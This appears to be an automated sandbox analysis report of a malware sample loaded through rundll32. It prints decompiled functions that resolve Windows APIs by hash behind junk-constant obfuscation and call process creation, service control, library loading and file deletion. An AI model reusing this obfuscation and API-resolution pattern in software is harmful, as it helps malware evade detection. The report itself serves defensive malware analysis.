                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: bc6b326a41a5d26bea6e29ba8bc052ecf4b9a8ac294c75c02919a97063cff55d
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 36113060D08289EAEF01D7E884097FEBFB55B21705F044098E5446B282D3BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 40%
                                                                      			E0028B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t49;
                                                                      				int _t58;
                                                                      				signed int _t60;
                                                                      				int _t65;
                                                                      
                                                                      				_push(_a68);
                                                                      				_t65 = __ecx;
                                                                      				_push(0);
                                                                      				_push(_a60);
                                                                      				_push(_a56);
                                                                      				_push(_a52);
                                                                      				_push(_a48);
                                                                      				_push(_a44);
                                                                      				_push(_a40);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(0);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00282550(_t49);
                                                                      				_v12 = 0xd1fa;
                                                                      				_t60 = 0x3c;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 >> 0xa;
                                                                      				_v12 = _v12 ^ 0x00001682;
                                                                      				_v20 = 0xd4c2;
                                                                      				_v20 = _v20 + 0x3986;
                                                                      				_v20 = _v20 ^ 0x00013905;
                                                                      				_v8 = 0x8c53;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 << 1;
                                                                      				_v8 = _v8 ^ 0x000060d6;
                                                                      				_v16 = 0x467b;
                                                                      				_v16 = _v16 + 0xffff2b71;
                                                                      				_v16 = _v16 ^ 0xffff105c;
                                                                      				E00277378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
                                                                      				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
                                                                      				return _t58;
                                                                      			}












                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0028B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: 897c8426967861aa73a39c6a5c28127b4da1702aa2e6a141c9d2bfe95753a911
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: C721B372800248FBDF159F95CD09CDFBFB9FB89714F408158FA1466260D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E0027471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t61;
                                                                      				void* _t62;
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      
                                                                      				E00282550(_t50);
                                                                      				_v20 = 0xf336;
                                                                      				_v20 = _v20 + 0x29f7;
                                                                      				_v20 = _v20 ^ 0x000152a0;
                                                                      				_v8 = 0xc9c4;
                                                                      				_v8 = _v8 >> 0x10;
                                                                      				_v8 = _v8 << 3;
                                                                      				_t63 = 0x6d;
                                                                      				_v8 = _v8 * 0x43;
                                                                      				_v8 = _v8 ^ 0x0000467c;
                                                                      				_v16 = 0x763b;
                                                                      				_t64 = 0x2d;
                                                                      				_v16 = _v16 / _t63;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 ^ 0x000058e5;
                                                                      				_v12 = 0x527e;
                                                                      				_v12 = _v12 / _t64;
                                                                      				_v12 = _v12 | 0xd776a7a3;
                                                                      				_v12 = _v12 ^ 0xd776f938;
                                                                      				_t61 = E00277378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
                                                                      				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
                                                                      				return _t62;
                                                                      			}













                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 002747E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: 07ec160735996aaa3cf2d5d133ef632512a448bea8b0d4487e4ac83e634d60c9
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 45210372D01208FBEF05DFE4C94A8DEBBB5EF05354F108089E924A6250D3B59B20DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E0028340E(void* __ecx, void* __edx, int _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				short* _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t45;
                                                                      				void* _t57;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				E00282550(_t45);
                                                                      				_v28 = 0x755cc3;
                                                                      				_v24 = 0;
                                                                      				_v20 = 0xc93f;
                                                                      				_v20 = _v20 >> 3;
                                                                      				_t59 = 0x1a;
                                                                      				_v20 = _v20 / _t59;
                                                                      				_v20 = _v20 ^ 0x00003660;
                                                                      				_v16 = 0x16ad;
                                                                      				_v16 = _v16 + 0x57a7;
                                                                      				_v16 = _v16 | 0xbe0b763b;
                                                                      				_v16 = _v16 ^ 0xbe0b2e9f;
                                                                      				_v12 = 0xa207;
                                                                      				_v12 = _v12 + 0xb6;
                                                                      				_t60 = 0x37;
                                                                      				_v12 = _v12 * 0x38;
                                                                      				_v12 = _v12 ^ 0x0023dbd3;
                                                                      				_v8 = 0xebb1;
                                                                      				_v8 = _v8 / _t60;
                                                                      				_v8 = _v8 | 0x19ad118e;
                                                                      				_v8 = _v8 ^ 0x19ad0924;
                                                                      				E00277378(_t60, 0x3e7f6fd6, _t60, 0x2daf77dd, 0x231);
                                                                      				_t57 = OpenSCManagerW(0, 0, _a12); // executed
                                                                      				return _t57;
                                                                      			}














                                                                      APIs
                                                                      • OpenSCManagerW.SECHOST(00000000,00000000,00003660,?,?,?,?,?,?,?,?,?,B0D9BF73), ref: 002834D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ManagerOpen
                                                                      • String ID:
                                                                      • API String ID: 1889721586-0
                                                                      • Opcode ID: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction ID: ffee0aa5d97f5ea3d8d452408ac03b5bee409afa2b1c39826385f52162eedd47
                                                                      • Opcode Fuzzy Hash: c0ae0e58ecd35d2b9c62b79812254f01c588eabc6ff7d27383c4dcafa84254bd
                                                                      • Instruction Fuzzy Hash: 812113B1D0131DEBDB08DFA9C84A8EFBBB4FB00314F10819AE414AA280D3B55B148F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E00280321(void* __ecx, int __edx, intOrPtr _a4, intOrPtr _a8, short* _a12) {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t44;
                                                                      				void* _t56;
                                                                      				void* _t59;
                                                                      				int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t60 = __edx;
                                                                      				_t59 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E00282550(_t44);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0xc39a9;
                                                                      				_v20 = 0xd5ea;
                                                                      				_v20 = _v20 | 0xff6e49b2;
                                                                      				_v20 = _v20 << 1;
                                                                      				_v20 = _v20 ^ 0xfeddf181;
                                                                      				_v12 = 0x5ebb;
                                                                      				_v12 = _v12 * 0x36;
                                                                      				_v12 = _v12 * 0x4e;
                                                                      				_v12 = _v12 | 0x0415626f;
                                                                      				_v12 = _v12 ^ 0x0617d8e0;
                                                                      				_v16 = 0xb467;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 * 0x58;
                                                                      				_v16 = _v16 ^ 0x03e03a17;
                                                                      				_v8 = 0xc80e;
                                                                      				_v8 = _v8 * 5;
                                                                      				_v8 = _v8 * 0x5d;
                                                                      				_v8 = _v8 >> 5;
                                                                      				_v8 = _v8 ^ 0x000b2851;
                                                                      				E00277378(__ecx, 0x612723fe, __ecx, 0x2daf77dd, 0x10e);
                                                                      				_t56 = OpenServiceW(_t59, _a12, _t60); // executed
                                                                      				return _t56;
                                                                      			}














                                                                      APIs
                                                                      • OpenServiceW.SECHOST(?,FEDDF181,B0D9BF73,?,?,?,?,?,?,?,?,00000000,B0D9BF73), ref: 002803E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: OpenService
                                                                      • String ID:
                                                                      • API String ID: 3098006287-0
                                                                      • Opcode ID: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction ID: 6b96b896a59230665fd812cf47de34d5d63b4d3c1db0b2097dc862b9c06036bb
                                                                      • Opcode Fuzzy Hash: 0746f5dc7b9730f7e3e73603d11b48040c955b65539017cf6c6302df4382ab22
                                                                      • Instruction Fuzzy Hash: D021DFB1C01209FBDB14DFA5CA8A89EBFB8EB45304F108199E825B6251D3B49B54DF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 95%
                                                                      			E002849CF(void* __ecx, void* __edx, WCHAR* _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t52;
                                                                      				struct HINSTANCE__* _t65;
                                                                      				signed int _t67;
                                                                      				signed int _t68;
                                                                      				signed int _t69;
                                                                      
                                                                      				_push(_a4);
                                                                      				E00282550(_t52);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0x2e62bd;
                                                                      				_v12 = 0x9175;
                                                                      				_v12 = _v12 >> 3;
                                                                      				_v12 = _v12 >> 4;
                                                                      				_t67 = 0x72;
                                                                      				_v12 = _v12 / _t67;
                                                                      				_v12 = _v12 ^ 0x00007d95;
                                                                      				_v20 = 0x6b8f;
                                                                      				_v20 = _v20 + 0xab5d;
                                                                      				_v20 = _v20 ^ 0x000118a2;
                                                                      				_v16 = 0x74fd;
                                                                      				_v16 = _v16 + 0xb2f4;
                                                                      				_v16 = _v16 | 0x45835894;
                                                                      				_v16 = _v16 ^ 0x45831718;
                                                                      				_v8 = 0x475a;
                                                                      				_t68 = 0x1a;
                                                                      				_v8 = _v8 / _t68;
                                                                      				_t69 = 0x71;
                                                                      				_v8 = _v8 / _t69;
                                                                      				_v8 = _v8 | 0x9a1a6af5;
                                                                      				_v8 = _v8 ^ 0x9a1a601d;
                                                                      				E00277378(_t69, 0xd3779e90, _t69, 0x90f109b3, 0xd8);
                                                                      				_t65 = LoadLibraryW(_a4); // executed
                                                                      				return _t65;
                                                                      			}















                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(00007D95), ref: 00284A98
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction ID: 5425035d161457b7a7c3c80164d743e1235a6d8406ee40029cc5c3e3854eda5a
                                                                      • Opcode Fuzzy Hash: c29722005f0625fdf4ec6d3b097d6093e6e9b8b9e5bc80068fdeaf8eb8cc74df
                                                                      • Instruction Fuzzy Hash: B32129B5E0020CFBDB08CFE5C94A5EEBBB1EB40304F10C099E518A7291D7B96B549F50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 58%
                                                                      			E002841CA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t42;
                                                                      				intOrPtr* _t50;
                                                                      				void* _t51;
                                                                      				signed int _t53;
                                                                      				void* _t57;
                                                                      
                                                                      				_t57 = __ecx;
                                                                      				E00282550(_t42);
                                                                      				_v20 = 0x33dd;
                                                                      				_t53 = 0x60;
                                                                      				_v20 = _v20 / _t53;
                                                                      				_v20 = _v20 ^ 0x0000445b;
                                                                      				_v8 = 0x98b2;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_v8 = _v8 | 0x9f0dae98;
                                                                      				_v8 = _v8 + 0xffff2dd8;
                                                                      				_v8 = _v8 ^ 0x9f6f2800;
                                                                      				_v16 = 0x7a4d;
                                                                      				_v16 = _v16 << 5;
                                                                      				_v16 = _v16 ^ 0x630ec107;
                                                                      				_v16 = _v16 ^ 0x6301fd0c;
                                                                      				_v12 = 0xd3a1;
                                                                      				_v12 = _v12 ^ 0x9b5a4994;
                                                                      				_v12 = _v12 + 0xffffbec0;
                                                                      				_v12 = _v12 ^ 0x9b5a0da8;
                                                                      				_t50 = E00277378(_t53, 0x7c314b7f, _t53, 0x90f109b3, 0x1d9);
                                                                      				_t51 =  *_t50(_t57, 0, _a12, 0x28, __ecx, __edx, _a4, _a8, _a12, 0, _a20, 0x28); // executed
                                                                      				return _t51;
                                                                      			}













                                                                      APIs
                                                                      • SetFileInformationByHandle.KERNELBASE(0026A181,00000000,0000445B,00000028), ref: 0028428A
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileHandleInformation
                                                                      • String ID:
                                                                      • API String ID: 3935143524-0
                                                                      • Opcode ID: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction ID: 8b6db1a90477232d3649273504659515e576b49d56e8c3f9cf203c97dafddb79
                                                                      • Opcode Fuzzy Hash: c542c3b5640c0f18f6fd6ea0d0e2ab16144babf3d8c5a3537028e32b44421a17
                                                                      • Instruction Fuzzy Hash: C4115C72E00309FFEB04DFE4CC4AAAEBBB5EF44710F108088E92466291D7B55B249F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00275AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t47;
                                                                      				int _t57;
                                                                      				signed int _t59;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				E00282550(_t47);
                                                                      				_v20 = 0xc8c;
                                                                      				_v20 = _v20 + 0xffffaa04;
                                                                      				_v20 = _v20 ^ 0xb702763d;
                                                                      				_v20 = _v20 ^ 0x48fdd1a6;
                                                                      				_v16 = 0xeb1c;
                                                                      				_v16 = _v16 << 4;
                                                                      				_t59 = 0xf;
                                                                      				_v16 = _v16 * 0xe;
                                                                      				_v16 = _v16 + 0xffff64c4;
                                                                      				_v16 = _v16 ^ 0x00cd6bec;
                                                                      				_v12 = 0x757;
                                                                      				_v12 = _v12 ^ 0x4183b2e4;
                                                                      				_v12 = _v12 << 2;
                                                                      				_v12 = _v12 / _t59;
                                                                      				_v12 = _v12 ^ 0x0067440e;
                                                                      				_v8 = 0xa082;
                                                                      				_v8 = _v8 >> 1;
                                                                      				_v8 = _v8 >> 8;
                                                                      				_v8 = _v8 ^ 0xcec43627;
                                                                      				_v8 = _v8 ^ 0xcec45939;
                                                                      				E00277378(_t59, 0x114af6f7, _t59, 0x2daf77dd, 0x11f);
                                                                      				_t57 = CloseServiceHandle(_a12); // executed
                                                                      				return _t57;
                                                                      			}










                                                                      APIs
                                                                      • CloseServiceHandle.SECHOST(48FDD1A6), ref: 00275B77
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleService
                                                                      • String ID:
                                                                      • API String ID: 1725840886-0
                                                                      • Opcode ID: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction ID: 05c517dacbbd85889b9a74697bf87fb67dd308bbb702ee817293bc9753386a09
                                                                      • Opcode Fuzzy Hash: f4cf61d19d0f0e03d476cf6393de878d7bbf839847225a23a7b5c25768a7d686
                                                                      • Instruction Fuzzy Hash: 3E110371D0020DFFDB08DFA9C94A8EEBBB0FB40304F508599E525A6291D7B99B25DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E0027E554(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t42;
                                                                      				int _t51;
                                                                      				signed int _t53;
                                                                      				struct _SHFILEOPSTRUCTW* _t57;
                                                                      
                                                                      				_push(_a4);
                                                                      				_t57 = __edx;
                                                                      				_push(__edx);
                                                                      				E00282550(_t42);
                                                                      				_v20 = 0xead4;
                                                                      				_v20 = _v20 + 0xffff9be4;
                                                                      				_v20 = _v20 ^ 0x000085bc;
                                                                      				_v16 = 0x46f7;
                                                                      				_v16 = _v16 << 0xe;
                                                                      				_v16 = _v16 << 7;
                                                                      				_t53 = 0x39;
                                                                      				_v16 = _v16 / _t53;
                                                                      				_v16 = _v16 ^ 0x03e8aab4;
                                                                      				_v12 = 0x2beb;
                                                                      				_v12 = _v12 ^ 0xafae01c3;
                                                                      				_v12 = _v12 + 0xffff58eb;
                                                                      				_v12 = _v12 ^ 0xa5118136;
                                                                      				_v12 = _v12 ^ 0x0abc415f;
                                                                      				_v8 = 0xa691;
                                                                      				_v8 = _v8 ^ 0x7591c523;
                                                                      				_v8 = _v8 << 0xa;
                                                                      				_v8 = _v8 + 0x20df;
                                                                      				_v8 = _v8 ^ 0x458ea297;
                                                                      				E00277378(_t53, 0x11ef7293, _t53, 0xd20b8aa4, 0x23a);
                                                                      				_t51 = SHFileOperationW(_t57); // executed
                                                                      				return _t51;
                                                                      			}











                                                                      APIs
                                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?), ref: 0027E60B
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileOperation
                                                                      • String ID:
                                                                      • API String ID: 3080627654-0
                                                                      • Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction ID: ce30d03d0b849cd46b4b81a6fb174705f6418538b64af2bbb5abaef6e51e5c69
                                                                      • Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
                                                                      • Instruction Fuzzy Hash: F71123B1D01318BBEB18DFA4C84A8DEBBB4FB00718F108598E82576241D3B95B44DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E0027EB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t34;
                                                                      				int _t44;
                                                                      
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00282550(_t34);
                                                                      				_v8 = 0xd1b2;
                                                                      				_v8 = _v8 * 0x63;
                                                                      				_v8 = _v8 << 4;
                                                                      				_v8 = _v8 * 0x74;
                                                                      				_v8 = _v8 ^ 0x4bec8e88;
                                                                      				_v20 = 0x1fc5;
                                                                      				_v20 = _v20 + 0x9c84;
                                                                      				_v20 = _v20 ^ 0x0000b099;
                                                                      				_v16 = 0x542c;
                                                                      				_v16 = _v16 | 0x3ba7d0a3;
                                                                      				_v16 = _v16 ^ 0x3ba7e6ce;
                                                                      				_v12 = 0x8319;
                                                                      				_v12 = _v12 * 0x45;
                                                                      				_v12 = _v12 + 0xffff39a4;
                                                                      				_v12 = _v12 ^ 0x0022b84c;
                                                                      				E00277378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
                                                                      				_t44 = DeleteFileW(_a8); // executed
                                                                      				return _t44;
                                                                      			}









                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(3BA7E6CE), ref: 0027EBC2
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteFile
                                                                      • String ID:
                                                                      • API String ID: 4033686569-0
                                                                      • Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction ID: 678c83d54545e003ec635073dc1fc5522f3caa5391d1bceabe0c17498ecac5b7
                                                                      • Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
                                                                      • Instruction Fuzzy Hash: 6111E3B1C0020DFBDF04DFE4DA4689EBBB4FB40314F60C599E814A62A1D7749B549F90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0027F1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                      				unsigned int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				void* _t46;
                                                                      				int _t57;
                                                                      				signed int _t59;
                                                                      				signed int _t60;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				E00282550(_t46);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v28 = 0x28beb0;
                                                                      				_v16 = 0xe97b;
                                                                      				_v16 = _v16 >> 3;
                                                                      				_t59 = 0x47;
                                                                      				_v16 = _v16 / _t59;
                                                                      				_v16 = _v16 ^ 0x00001a39;
                                                                      				_v12 = 0x2d01;
                                                                      				_v12 = _v12 >> 8;
                                                                      				_t60 = 0x3a;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 ^ 0x000023d3;
                                                                      				_v20 = 0xc5d9;
                                                                      				_v20 = _v20 | 0x3e7a6da8;
                                                                      				_v20 = _v20 ^ 0x3e7ad9f3;
                                                                      				_v8 = 0x3ddd;
                                                                      				_v8 = _v8 >> 7;
                                                                      				_v8 = _v8 + 0xffffadd9;
                                                                      				_v8 = _v8 ^ 0xffff8e91;
                                                                      				E00277378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
                                                                      				_t57 = CloseHandle(_a12); // executed
                                                                      				return _t57;
                                                                      			}













                                                                      APIs
                                                                      • CloseHandle.KERNEL32(3E7AD9F3), ref: 0027F2A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction ID: 95afd98687017040017360548a82ee506a08824816f12396cbe56bbe756c9e9a
                                                                      • Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
                                                                      • Instruction Fuzzy Hash: 141126B6D0020CEBDF05DFE5C84A9DEBBB5FB14308F10C589E914A6290D3B59B649F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00298361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0029839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 002983A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
